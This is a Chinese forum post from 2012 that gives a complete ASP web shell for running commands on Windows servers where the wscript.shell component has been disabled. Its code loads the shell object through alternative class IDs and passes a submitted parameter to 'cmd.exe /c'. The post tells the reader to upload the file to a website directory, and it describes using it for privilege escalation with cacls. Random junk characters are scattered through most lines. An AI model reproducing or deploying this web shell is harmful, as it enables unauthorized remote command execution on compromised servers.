可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。% O- I1 M/ Z) A3 D: P+ X" @" H, ~
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
6 h2 g" A R4 v要想让运行命令可以试试这种方法,成功率为五五之数。
8 r% h( q2 ?$ U9 i7 H把下面代码复制:8 S: k2 k4 D4 ~
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>2 e3 f# U2 ]# U% n
<%if err then%>% a% L/ O/ M! H$ I: X$ o! A9 y
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>7 I; `+ {- F$ b4 @' j: w& a! a
<% F# F" e- |3 s
end if
; { [* r* l2 F9 i$ z% xresponse.write("<textarea readonly cols=80 rows=20>"): I. i* _6 J! ^* W a u8 Z7 y
On Error Resume Next
, Z! R8 t4 M/ n/ Y7 R: mresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall) I" m. u5 F& {! T" K
response.write("</textarea>")
, n6 G9 L- G/ \ i7 H$ T4 ^ {3 kresponse.write("<form method='post'>")6 @" B% |( N% t% o4 s5 _$ n b$ T
response.write("<input type=text name='c' size=60><br>")
G, x6 B" P0 ]response.write("<input type=submit value='执行'></form>")' T6 W. g& Z5 `9 ]9 k
%>& \) N. j' g' ]0 g
) L. ?1 u& d4 T# B! ?- `- I4 N
保存为一个asp文件,然后传到网站目录上去9 B/ V/ c3 W8 J; t) U% e" W
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。% Q8 H" w) a: ]5 [
我用此成功运行过cacls命令。
/ E1 B2 I4 y( v; ^" S0 Z
; f, E' F b B% w7 j第二那就是运行时出错,可能限制某些代码执行 |
发表于 2012-9-15 14:36:53
收藏
支持
反对